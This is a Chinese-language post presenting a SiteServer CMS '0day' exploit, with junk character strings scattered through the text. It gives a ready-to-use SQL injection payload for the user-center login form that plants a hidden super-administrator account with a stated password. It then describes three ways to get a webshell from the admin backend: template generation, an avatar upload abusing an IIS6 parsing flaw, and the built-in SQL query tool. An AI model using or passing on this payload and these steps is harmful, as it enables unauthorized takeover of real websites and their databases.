SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

6 z" W/ D- V' d  o/ Zstieserver官网:www.siteserver.cn
6 G) B& d! f! }# g4 h# t; f
) U& \% d0 c% ^% R7 t
: R1 V) I4 L! I
EXP:

  o# u. \  p7 |3 ^4 |" e直接访问UserCenter/login.aspx


, f( F" v4 j) N9 }7 u% J
用户名处输入：
8 ~4 m7 g( _2 b4 d
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


3 D" g+ G  m1 R
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



8 A7 S, ?2 ]0 F) [之后再访问后台SiteServer/login.aspx用插入的用户登陆

. N3 g5 z. H/ q, w- ~+ v0 j& [; |: Z

后台拿webshell的三种方法：

一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

+ ?. l( H1 i9 }" O8 v' ~/ O二、

+ F7 ?! w3 l" w, F成员权限-》添加用户-》用户名为：1.asp

0 l1 @! A2 c- k/ U7 I/ {http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
1 r! A' u$ V" N4 k
0 ^: ~& b' l2 e+ O（ps：后台添加用户时不会验证是否含有非法字符）
0 f! [  k! z9 s: l' s
6 R! R7 s; [! ?& T三、

2 z: c, M  k5 F! k$ n2 v系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
- M3 y8 G, u) w
系统工具-》数据库工具-》SQL语句查询
! y8 ?$ j, l1 \% L! ]1 L. X这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
4 [0 ^" I2 n9 U* o5 Z. @1 w
- P: h# N/ I7 G1 ~